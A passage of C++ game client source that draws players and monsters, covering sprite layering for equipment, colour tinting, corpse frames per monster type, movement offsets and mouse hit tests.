				m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
			else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}

		if (iBodyArmorIndex != -1)
		{	if (iArmorColor == 0)
				m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
			else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
		}

		if (iHelmIndex != -1)
		{	if (iHelmColor == 0)
				 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
			else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
		}

		if (iMantleIndex != -1)
		{	if (iMantleColor == 0)
				m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
			else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
		}

		if ((_tmp_iStatus & 0x20) != 0) // Berserk
			m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSpriteRGB(sX, sY,  cFrame, 0, -5, -5, dwTime);
		DrawAngel(24+(_tmp_cDir - 1), sX+20, sY-20, _tmp_cFrame, dwTime);
		DrawWanted(sX, sY, dwTime);
		CheckActiveAura2(sX, sY, dwTime,  _tmp_sOwnerType);

	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX, sY, _tmp_cName, _tmp_iStatus);
	}
	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY;
		}else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}

	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) 
		 return TRUE;
	else return FALSE;
}

BOOL   CGame::DrawObject_OnDead(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int iBodyIndex, iUndiesIndex, iHairIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iR, iG, iB, iFrame, iMantleIndex, iHelmIndex;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;

	if( _tmp_sOwnerType == 66) return FALSE;

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		iFrame = 7;
		iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (11 * 8);
		iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 11;
		iHairIndex   = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 11;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				 iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 11;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			 iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 11;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			 iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 11;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			 iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 11;
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			 iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 11;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			 iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 11;
		break;

	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		iFrame = 7;
		iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (11 * 8);
		iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 11;
		iHairIndex   = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 11;
		if ((_tmp_sAppr4 & 0x80) == 0)
		{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				 iBodyArmorIndex = -1;
			else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 11;
		}
		if ((_tmp_sAppr3 & 0x000F) == 0)
			 iArmArmorIndex = -1;
		else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 11;
		if ((_tmp_sAppr3 & 0x0F00) == 0)
			 iPantsIndex = -1;
		else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 11;
		if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
			 iBootsIndex = -1;
		else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 11;
		if ((_tmp_sAppr4 & 0x0F00) == 0)
			 iMantleIndex = -1;
		else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 11;
		if ((_tmp_sAppr3 & 0x00F0) == 0)
			 iHelmIndex = -1;
		else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 11;
		break;
	default:
		switch (_tmp_sOwnerType) {
		case 28: // Troll
		case 29: // Ogre
		case 30: // Liche
		case 31: // DD		// les 2 dernieres sont pas bonnes pour un mort !
		case 63: // Frost	// les 2 dernieres sont pas bonnes pour un mort !
			iFrame = 5;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
			break;

		case 32: // Uni
		case 33: // WW
		case 43: // LWB
		case 44: // GHK
		case 45: // GHKABS
		case 46: // TK
		case 47: // BG
		case 48: // SK
		case 49: // HC
		case 50: // TW
		case 53: // BB
		case 54: // DE
		case 55: // Rabbit
		case 56: // Cat
		case 57: // Frog
		case 58: // MG
		case 59: // Ettin
		case 60: // Plant
		case 61: // Rudolph
		case 62: // Direboar
		case 64: // Crops  ----------- Crop ici! etonant, pourtant !
		case 65: // IceGolem
		case 70: // Dragon..........Ajouts par Snoopy
		case 71: // Centaur
		case 72: // ClawTurtle
		case 74: // GiantCrayfish
		case 75: // Gi Lizard
		case 76: // Gi Tree
		case 77: // Master Orc
		case 78: // Minaus
		case 79: // Nizie
		case 80: // Tentocle
		case 82: // Sorceress
		case 83: // ATK
		case 84: // MasterElf
		case 85: // DSK
		case 88: // Barbarian
			iFrame = 7;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
			break;

		case 86: // HBT
		case 87: // CT
		case 89: // AGC
			iFrame = 7;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			break;

		case 66: // Wyvern
			iFrame = 15;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			break;

		case 73: // FireWyvern
			iFrame = 7;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			bTrans = TRUE; // Prevents showing hugly corpse
			break;

		case 81: // Abaddon
			iFrame = 0;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			bTrans = TRUE; // Prevents showing hugly corpse
			break;

		case 51: // CP
			iFrame = 0;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
			break;

		case 52: // GG
			iFrame = 11;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
			break;

		case 91: // Gate
			iFrame = 5;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			break;

		default: // 40*4 (10...27)
			iFrame = 3;
			iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
			break;
		}
		iUndiesIndex = -1;
		iHairIndex   = -1;
		iArmArmorIndex = -1;
		iBodyArmorIndex = -1;
		iPantsIndex = -1;
		iBootsIndex = -1;
		iMantleIndex = -1;
		iHelmIndex      = -1;
		break;
	}
	if (bTrans == FALSE)
	{	if (_tmp_cFrame == -1)
		{	_tmp_cFrame = 7;
			if ((_tmp_iStatus & 0x40) != 0)
				 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, iFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
			else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, iFrame, dwTime);

			SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
				     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

			if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);

			if ((iHairIndex != -1) && (iHelmIndex == -1))
			{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
				m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, iR, iG, iB, dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 1))
			{	if (iBootsColor == 0)
					m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iPantsIndex != -1)
			{	if (iPantsColor == 0)
					m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
			}

			if (iArmArmorIndex != -1)
			{	if (iArmColor == 0)
					m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
			}

			if ((iBootsIndex != -1) && (iSkirtDraw == 0))
			{	if (iBootsColor == 0)
					m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
			}

			if (iBodyArmorIndex != -1)
			{	if (iArmorColor == 0)
					m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
			}

			if (iHelmIndex != -1)
			{	if (iHelmColor == 0)
					 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
			}

			if (iMantleIndex != -1)
			{	if (iMantleColor == 0)
					m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, dwTime);
				else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + _tmp_cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
			}
		}else if ((_tmp_iStatus & 0x20) != 0)
				 m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX, sY, iFrame, -2*_tmp_cFrame +5, -2*_tmp_cFrame -5, -2*_tmp_cFrame -5, dwTime);
			else m_pSprite[iBodyIndex + (_tmp_cDir -1)]->PutTransSpriteRGB(sX, sY, iFrame, -2*_tmp_cFrame,-2*_tmp_cFrame,-2*_tmp_cFrame, dwTime);

	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX, sY, _tmp_cName, _tmp_iStatus);
	}

	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY;
		}else
		{	m_pMapData->ClearDeadChatMsg(indexX, indexY);
	}	}
	// Snoopy: Abaddon effects
	if (_tmp_sOwnerType == 81)
	{	Abaddon_corpse(sX, sY); // By Snoopy....
	}else if (_tmp_sOwnerType == 73)
	{	m_pEffectSpr[35]->PutTransSprite70(sX+20, sY-15,  rand()%10, dwTime);
	}
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) 
		 return TRUE;
	else return FALSE;
}



BOOL   CGame::DrawObject_OnMove(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int dx, dy;
 int iBodyIndex, iHairIndex, iUndiesIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iHelmIndex, iR, iG, iB;
 int iWeaponIndex, iShieldIndex, iAdd, iMantleIndex;
 BOOL bInv = FALSE;
 int iWeaponGlare, iShieldGlare;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;

	if(_tmp_sOwnerType == 35 )	bInv = TRUE; //Energy-Ball, Wyvern

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}
	iWeaponGlare = (_tmp_sAppr4 & 0x000C) >> 2;
	iShieldGlare = (_tmp_sAppr4 & 0x0003);
	if ( (_tmp_iStatus & 0x10) != 0)
	{	if (memcmp(m_cPlayerName, _tmp_cName, 10) == 0) bInv = TRUE;
		else if (bCheckItemEquiped("NecklaceOfBeholder") == true) bInv = TRUE; //beholder neck
		else if( _iGetFOE(_tmp_iStatus) == 1 ) bInv = TRUE;
		else return FALSE;
	}

	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
		if ((_tmp_sAppr2 & 0xF000) != 0)
		{	iAdd = 3;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*3 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 3;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (2 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 2;
			iHairIndex	 = DEF_SPRID_HAIR_M + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 2;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 2;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 2;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 2;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 2;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else  iWeaponIndex = DEF_SPRID_WEAPON_M + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*2 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_M + (_tmp_sAppr2 & 0x000F)*8 + 2;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 2;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 2;
		}
		break;

	case 4:
	case 5:
	case 6:
		if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		if ((_tmp_sAppr2 & 0xF000) != 0)
		{	iAdd = 3;
			iBodyIndex   = 500 + (_tmp_sOwnerType - 1 )*8*15 + (iAdd * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + iAdd;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + iAdd;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + iAdd;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + iAdd;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*3 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 3;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + iAdd;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + iAdd;
		}else
		{	iBodyIndex   = 500  + (_tmp_sOwnerType - 1 )*8*15 + (2 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 2;
			iHairIndex	 = DEF_SPRID_HAIR_W + ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 2;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 2;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 2;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 2;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 2;
			if (((_tmp_sAppr2 & 0x0FF0) >> 4) == 0)
				iWeaponIndex = -1;
			else iWeaponIndex = DEF_SPRID_WEAPON_W + ((_tmp_sAppr2 & 0x0FF0) >> 4)*64 + 8*2 + (_tmp_cDir - 1);
			if ((_tmp_sAppr2 & 0x000F) == 0)
				iShieldIndex = -1;
			else iShieldIndex = DEF_SPRID_SHIELD_W + (_tmp_sAppr2 & 0x000F)*8 + 2;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 2;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 2;
		}
		break;

	default:
		if (_tmp_sOwnerType == 86) iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
		else iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (1 * 8);
		iUndiesIndex    = -1;
		iHairIndex      = -1;
		iBodyArmorIndex = -1;
		iArmArmorIndex  = -1;
		iBootsIndex     = -1;
		iPantsIndex     = -1;
		iWeaponIndex    = -1;
		iShieldIndex    = -1;
		iMantleIndex    = -1;
		iHelmIndex      = -1;
		break;
	}
	dx = 0;
	dy = 0;
	switch (_tmp_cDir) {
	case 1 : dy = 28 - (_tmp_cFrame<<2); break;
	case 2 : dy = 28 - (_tmp_cFrame<<2); dx = (_tmp_cFrame<<2) - 28; break;
	case 3 : dx = (_tmp_cFrame<<2) - 28; break;
	case 4 : dx = (_tmp_cFrame<<2) - 28; dy = (_tmp_cFrame<<2) - 28; break;
	case 5 : dy = (_tmp_cFrame<<2) - 28; break;
	case 6 : dy = (_tmp_cFrame<<2) - 28; dx = 28 - (_tmp_cFrame<<2); break;
	case 7 : dx = 28 - (_tmp_cFrame<<2); break;
	case 8 : dx = 28 - (_tmp_cFrame<<2); dy = 28 - (_tmp_cFrame<<2); break;
	}
	switch (_tmp_sOwnerType) {
	case 1:
	case 2:
	case 3:
	case 4:
	case 5:
	case 6:

	case 28: // Troll.
	case 29: // Orge.
	case 30: // Liche
	case 31: // DD
	case 32: // Uni
	case 33: // ww

	case 43: // LWB
	case 44: // GHK
	case 45: // GHKABS
	case 46: // TK
	case 47: // BG
	case 48: // SK
	case 49: // HC
	case 50: // TW

	case 52: // GG
	case 53: // BB
	case 54: // DE
	case 55: // Rabbit
	case 56: // Cat
